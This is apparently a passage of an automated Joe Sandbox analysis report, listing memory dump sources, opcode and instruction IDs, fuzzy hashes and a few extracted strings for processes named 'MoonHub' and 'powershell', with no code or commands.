                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5ade2eaf17faefb78e68fe1d7c06f3f20d924a58d1d07b4216a82b618da6823a
                                                                                                                                                                                • Instruction ID: 797eced0c940fd0def5ea4ed8c79477b9ffc4c2e5b48ab0b4bbf19921309a431
                                                                                                                                                                                • Opcode Fuzzy Hash: 5ade2eaf17faefb78e68fe1d7c06f3f20d924a58d1d07b4216a82b618da6823a
                                                                                                                                                                                • Instruction Fuzzy Hash: 15E08C12E1CD2B0EF9B4B16934151B821C1EF183A0F0410B3EC3CC66A5EE2D6DDA4ACE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 232a0c9af3e6c4108d332fbc74bac483bd67900016466e2675aba2910e6917f7
                                                                                                                                                                                • Instruction ID: 96cf5151847ddfd69940d7a53794af452d9052d5091223b290a871d935f4ca38
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 19f352dd794dd9acf247597bf28512fc3a4a2150728eec1070f5cf4c9f1ba5da
                                                                                                                                                                                • Instruction ID: 4bfe2ec5b5627087c4e92b98669dba0158bfc93902108a3732e58d654dfca93a
                                                                                                                                                                                • Opcode Fuzzy Hash: 19f352dd794dd9acf247597bf28512fc3a4a2150728eec1070f5cf4c9f1ba5da
                                                                                                                                                                                • Instruction Fuzzy Hash: 7AC01222D4CA0A4FFBA1A998F4415FDA791FBA0B90F50017AD1044219ADF396547C689
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 42304ba2587d695149edb394b8d62478cf12457d7a6924d9746d288f9a6625de
                                                                                                                                                                                • Instruction ID: 07d2d8abebad0aca5a10fa9f6349277489a35ed868764c65e3f60ce66a5c61db
                                                                                                                                                                                • Opcode Fuzzy Hash: 42304ba2587d695149edb394b8d62478cf12457d7a6924d9746d288f9a6625de
                                                                                                                                                                                • Instruction Fuzzy Hash: 9BD01221E0CB1A8EEB91A998A441AFD77D0FFE1791F80017A900546156DF3851468AC9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6d1ae938dc8e4606c70e5221219bde18b6edba57d0df3f0fd5e01599d3ca1b21
                                                                                                                                                                                • Instruction ID: 337f770d057e245830c27ef859b552996fa7ed7bb3342e0c7b39fc09891d2e43
                                                                                                                                                                                • Opcode Fuzzy Hash: 6d1ae938dc8e4606c70e5221219bde18b6edba57d0df3f0fd5e01599d3ca1b21
                                                                                                                                                                                • Instruction Fuzzy Hash: E9C02235D0CA0E4FD6A19584A4010BA37A1FBA0AA0F000229E404A2086FF3808828A80
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 35f3ed918e9e8c77a2b26c4b690a8d38bd85b0615ec24b3c63818c47661ccb07
                                                                                                                                                                                • Instruction ID: 14604880ef2ffe24d66052b90dcd200e450dce3835f15c8379b58caa734f0576
                                                                                                                                                                                • Opcode Fuzzy Hash: 35f3ed918e9e8c77a2b26c4b690a8d38bd85b0615ec24b3c63818c47661ccb07
                                                                                                                                                                                • Instruction Fuzzy Hash: 66C01272D1C54A9FF7856AE4A4410FA3351FB90754F50073EE549821C6DF7855438644
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: eaf16fc7d097f0d68e61e13dec6fdf85ca7b24a99be45b482d88206924821b58
                                                                                                                                                                                • Instruction ID: 19c1dfaf4a1747628dd251ecd268bcb8dbdef61a65d291b438b30c75cfc1fb54
                                                                                                                                                                                • Opcode Fuzzy Hash: eaf16fc7d097f0d68e61e13dec6fdf85ca7b24a99be45b482d88206924821b58
                                                                                                                                                                                • Instruction Fuzzy Hash: E1D0C971E4C6164EEBA3A954A4919B96390BBA0780F500179944986186EF78918BC685
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3c4808516cdd90e3c105e02383ea16028ce46acf209d76aef115cbdd844e9c6a
                                                                                                                                                                                • Instruction ID: 58e45c2517e635198c5f1f9293af756e72f10c8316b8430415abd5925c222221
                                                                                                                                                                                • Opcode Fuzzy Hash: 3c4808516cdd90e3c105e02383ea16028ce46acf209d76aef115cbdd844e9c6a
                                                                                                                                                                                • Instruction Fuzzy Hash: E4C04C01B1CA290AE55475DC78411A85281A784964B541677D51BC1299CD2A588101C5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 24e3fe822194e8bcf3fb819ded516a6da0c6f29cd40de828b4c242c3e240e6d1
                                                                                                                                                                                • Instruction ID: eaf9d93f5e42cc59e9441a4c41fdc4ec15d87d5e7724fbca5720022bef22fd05
                                                                                                                                                                                • Opcode Fuzzy Hash: 24e3fe822194e8bcf3fb819ded516a6da0c6f29cd40de828b4c242c3e240e6d1
                                                                                                                                                                                • Instruction Fuzzy Hash: AAC04C05B1CA290AE55075DC78411A85281A7849A4B941677D51BC1299DD2A584101C5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d14a0ea0eab9640bdbb3d160bea75b020ac9cebc4b3ed69b4fe68689f74a6566
                                                                                                                                                                                • Instruction ID: 5e14d8c628bff27a74ac85a5aca76196e1161178f9e34486add1f311bcde861b
                                                                                                                                                                                • Opcode Fuzzy Hash: d14a0ea0eab9640bdbb3d160bea75b020ac9cebc4b3ed69b4fe68689f74a6566
                                                                                                                                                                                • Instruction Fuzzy Hash: A8C08C01B1CA290AE150708C78011A85281A7C4960B180277D01AC1289CC29588101C5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6eb120be28984effc787b3233c1187d5027b990d21b2d7b6b6233340cfd5a3cc
                                                                                                                                                                                • Instruction ID: 5dcf05318863fecc3acbdf7e3f4959106784f1710334cc2948348a1815e2b68e
                                                                                                                                                                                • Opcode Fuzzy Hash: 6eb120be28984effc787b3233c1187d5027b990d21b2d7b6b6233340cfd5a3cc
                                                                                                                                                                                • Instruction Fuzzy Hash: 54C02220A0AC2C0E02A8B02C2808A3A00CACBCCA20B0C02ABA00CC3288CC200C0203C0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ed05916992812914758ee4b9a33dfb3b862f6c1ed102fac388142267aa228e21
                                                                                                                                                                                • Instruction ID: ca1e786ae54081bbb919604b86a1241391d6f76dddea6f4c6edff456fd6eba85
                                                                                                                                                                                • Opcode Fuzzy Hash: ed05916992812914758ee4b9a33dfb3b862f6c1ed102fac388142267aa228e21
                                                                                                                                                                                • Instruction Fuzzy Hash: 08C01212D5C7061AE694621CB4456BA17C0FBA0790F540021D005C124AED2951864545
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 9=j$(9=j$09=j$89=j$@9=j$H9=j$P8=j$P9=j$8=j$8=j
                                                                                                                                                                                • API String ID: 0-1212959903
                                                                                                                                                                                • Opcode ID: 66d4554c141e0481f952850f2dc9c65769ade8e6777f23bfbcb92a4b1dab0cfb
                                                                                                                                                                                • Instruction ID: c4f42cc1dbf99b42c3858d23a83d9bdfa8e4658fe736852152d6cef22f4abeba
                                                                                                                                                                                • Opcode Fuzzy Hash: 66d4554c141e0481f952850f2dc9c65769ade8e6777f23bfbcb92a4b1dab0cfb
                                                                                                                                                                                • Instruction Fuzzy Hash: 6CC1D96480FAC5BFC74667B848669CABFE0EF03294B1405FFE0459F0A3DA9C4809C765
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: [=j$ [=j$ [=j$ [=j$ [=j$ [=j$ [=j$[=jV
                                                                                                                                                                                • API String ID: 0-359273082
                                                                                                                                                                                • Opcode ID: c0e040a386b27d3bdf89f0b98d18769677f7284e219c4f7264cdafc3346ca80d
                                                                                                                                                                                • Instruction ID: f5ae0089ed1d0122ce970db69ffaee443bd3a8ad35a47ad494390f47fa986717
                                                                                                                                                                                • Opcode Fuzzy Hash: c0e040a386b27d3bdf89f0b98d18769677f7284e219c4f7264cdafc3346ca80d
                                                                                                                                                                                • Instruction Fuzzy Hash: 5FD1276180EAC6AFE796EB3848156EA7FE1FF07254F0844FDD489CB1A7EA6C5C058311
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: c=j$P9=j$h9=j$p9=j$x9=j$9=j$9=j
                                                                                                                                                                                • API String ID: 0-1585086864
                                                                                                                                                                                • Opcode ID: 743baebe2363209e96dfe1eef8493c3af8a96a9a4e2ea6d133ee828b5727701b
                                                                                                                                                                                • Instruction ID: 9ca95b2ac8bffca5ef54d50eac92016608e447ea3e649277438a31d0b76559f9
                                                                                                                                                                                • Opcode Fuzzy Hash: 743baebe2363209e96dfe1eef8493c3af8a96a9a4e2ea6d133ee828b5727701b
                                                                                                                                                                                • Instruction Fuzzy Hash: 60A1886050EA85FFD71A67B45C12ECAFFE0AF02255F2906FAE0459F0A3DAAC1844C765
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: c=j$`9=j$h9=j$p9=j$x9=j$9=j$9=j
                                                                                                                                                                                • API String ID: 0-4015424263
                                                                                                                                                                                • Opcode ID: df2071b36fefab9bbb806283cecc4c0920f0c6903b7a035b31d9d8d013668e30
                                                                                                                                                                                • Instruction ID: 66ac4d4496af06c30bbd645708660bd39af3959dc4f99a44106587c8f30416d1
                                                                                                                                                                                • Opcode Fuzzy Hash: df2071b36fefab9bbb806283cecc4c0920f0c6903b7a035b31d9d8d013668e30
                                                                                                                                                                                • Instruction Fuzzy Hash: 5691686054FA85BFC74AA7B45812ACAFFE0AF03254F2906FEE0459F0A3DA6C1C45C765
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: G_^H$G_^`$G_^b$G_^t$G_^v
                                                                                                                                                                                • API String ID: 0-843208800
                                                                                                                                                                                • Opcode ID: 7f63b7a71d5bce2bafeb5883dfad36541207f026d149da31d299bb2e4146ba75
                                                                                                                                                                                • Instruction ID: d0e8ddf5a14edc2a0ce9f995202551260a617e3666dfd54a561a7e69b7bc9bad
                                                                                                                                                                                • Opcode Fuzzy Hash: 7f63b7a71d5bce2bafeb5883dfad36541207f026d149da31d299bb2e4146ba75
                                                                                                                                                                                • Instruction Fuzzy Hash: E14127B3D4E9562FE6187A6DB8061F93790FF803B5F0891B2C55DCA043DE2868478ED8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: K_^4$K_^5$K_^6$K_^?$K_^@
                                                                                                                                                                                • API String ID: 0-538154125
                                                                                                                                                                                • Opcode ID: 3fecba1278ac18b4fd634e32b38daf05b4fa41303905216f4c26a3e350bc6b3b
                                                                                                                                                                                • Instruction ID: e9eaa726bf62f2507fc4291d1e989f7c2226c34f456b5ee6bc46cfd71cb6a372
                                                                                                                                                                                • Opcode Fuzzy Hash: 3fecba1278ac18b4fd634e32b38daf05b4fa41303905216f4c26a3e350bc6b3b
                                                                                                                                                                                • Instruction Fuzzy Hash: 3A21E5F76899157E9A0A7A7CF4410F837A0EF94279B4892BBD0D8CE043DE1520878AD8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: K_^$K_^$K_^$K_^
                                                                                                                                                                                • API String ID: 0-1134090584
                                                                                                                                                                                • Opcode ID: 62e695368af1adcfb1b8c3164de1052538b3e88911f623432c7f8757e7c8ea63
                                                                                                                                                                                • Instruction ID: c77b4833287a372bf22dff88cab29835244c8e8293c460c9b2c223010a7f16fc
                                                                                                                                                                                • Opcode Fuzzy Hash: 62e695368af1adcfb1b8c3164de1052538b3e88911f623432c7f8757e7c8ea63
                                                                                                                                                                                • Instruction Fuzzy Hash: 11210AB3C0D9A95FD759B66D78990F43790FF502ACF0802B3C888CF063EE2425078949
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: K_^$K_^$K_^$K_^
                                                                                                                                                                                • API String ID: 0-1134090584
                                                                                                                                                                                • Opcode ID: c605fc93687dc5c11523d38b7b197756d2ea84d0841bdfc9371bd0699c35255a
                                                                                                                                                                                • Instruction ID: dd4bd02126f3735b15067c38bca07761309842e9e4c39365321e429fb1953d55
                                                                                                                                                                                • Opcode Fuzzy Hash: c605fc93687dc5c11523d38b7b197756d2ea84d0841bdfc9371bd0699c35255a
                                                                                                                                                                                • Instruction Fuzzy Hash: D521E7B3C0D9A95ED759BA6D68590F43790FF106ACF0805B2C888CF063EE2425078A49
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: L_^0$L_^2$L_^4$L_^6
                                                                                                                                                                                • API String ID: 0-2047270763
                                                                                                                                                                                • Opcode ID: 7ff69ff954960246898db6f8392c9e3b0656f18a0b5d234f444cade3e08a98e0
                                                                                                                                                                                • Instruction ID: 096dac424462a065a4bbce8dd99eca834e1230e0644df7f089c456747d4d070a
                                                                                                                                                                                • Opcode Fuzzy Hash: 7ff69ff954960246898db6f8392c9e3b0656f18a0b5d234f444cade3e08a98e0
                                                                                                                                                                                • Instruction Fuzzy Hash: C7D012FE8504281DD5061CA254E00EC1B84C2013B8F207AA3D766D5103CB51D2C3D454
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 941fbace1fae1be0b7d66e10afc6eb33dce03515103ee94f825320de16830a7b
                                                                                                                                                                                • Instruction ID: e1afed49720fe82d8d0da61bf87dcfebfa0992ea0a55132f59da156f95304ffa
                                                                                                                                                                                • Opcode Fuzzy Hash: 941fbace1fae1be0b7d66e10afc6eb33dce03515103ee94f825320de16830a7b
                                                                                                                                                                                • Instruction Fuzzy Hash: 36514772A0DA955FE34AA62CE8550F13BD0FF527A0B5801BFD088CB193DE256C47C391
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.2338304280.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 616b9fb06df113c64a63b9db2dbf237e0526d4bee153d4ee341818fd661eac23
                                                                                                                                                                                • Instruction ID: ad6582cc94214a6da8be751fd49bd0a3758dfd4d5faf2f855aefca68e3ea3014
                                                                                                                                                                                • Opcode Fuzzy Hash: 616b9fb06df113c64a63b9db2dbf237e0526d4bee153d4ee341818fd661eac23
                                                                                                                                                                                • Instruction Fuzzy Hash: 5981F23290EBC50FE753A7A868641A57FE0EFA7660F0901FBC049DB0E3DA195D45C362
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.2338304280.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d3d613ba2b1648dc89083a610ef3922f456c5a57cabdc136b48c83a2ae9ebf57
                                                                                                                                                                                • Instruction ID: d6c79afeb721ca8c82609ceb1248747423faae8d7b39fc2a2493cc3c88ec37ab
                                                                                                                                                                                • Opcode Fuzzy Hash: d3d613ba2b1648dc89083a610ef3922f456c5a57cabdc136b48c83a2ae9ebf57
                                                                                                                                                                                • Instruction Fuzzy Hash: DE61D02284E7C60FE75357B858641A13FF19FA7A60B0E01FBD089DB0E3DA195C4AC366
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.2337896425.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_7ff848e70000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b2a7b1f44a79f8556a83655099b23a40e9a133b3e0198a59266a9d13e26c5493
                                                                                                                                                                                • Instruction ID: 51253c7c5b0921b3aef22e48cb5fb9cc213d7464ecc5a4a2105b93d59aaadb1a
                                                                                                                                                                                • Opcode Fuzzy Hash: b2a7b1f44a79f8556a83655099b23a40e9a133b3e0198a59266a9d13e26c5493
                                                                                                                                                                                • Instruction Fuzzy Hash: 9621E23060D9095FEB4CEA1CD8459B677D0FBA9360B1401BED84AC7242DE22FC82C785
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.2337896425.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_7ff848e70000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                • Instruction ID: 22a0799654b5678196981b115be33a21fe9c44e2b1f7f06b4daefade685b6cda
                                                                                                                                                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                • Instruction Fuzzy Hash: D801677111CB0C8FDB44EF0CE451AAAB7E0FB95364F10056DE58AC3691D736E882CB45
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.2450063277.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ebdc27f5001d1807991f4f57f8050a8a0c7fa151800707eafa81fb6b85d4810b
                                                                                                                                                                                • Instruction ID: 2b37f60ba37e54bf12a055bba4a3adf001998e542dda42d61119a707a7aacd06
                                                                                                                                                                                • Opcode Fuzzy Hash: ebdc27f5001d1807991f4f57f8050a8a0c7fa151800707eafa81fb6b85d4810b
                                                                                                                                                                                • Instruction Fuzzy Hash: D0D14631E0EA8A5FEBA9AB6898155B57BE0FF56391F1800FBD04CC71D3DB28A805C355
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.2449382018.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ff848e60000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                • Instruction ID: bc0586010bb7648f8a9788ff2eea40288e3a4c6b570a1a89675a5d11dfb431f3
                                                                                                                                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                • Instruction Fuzzy Hash: CC01A73010CB0D4FDB44EF0CE051AA6B3E0FB85360F10052DE58AC3651DB32E882CB45
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000013.00000002.2591686944.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_19_2_7ff848f50000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
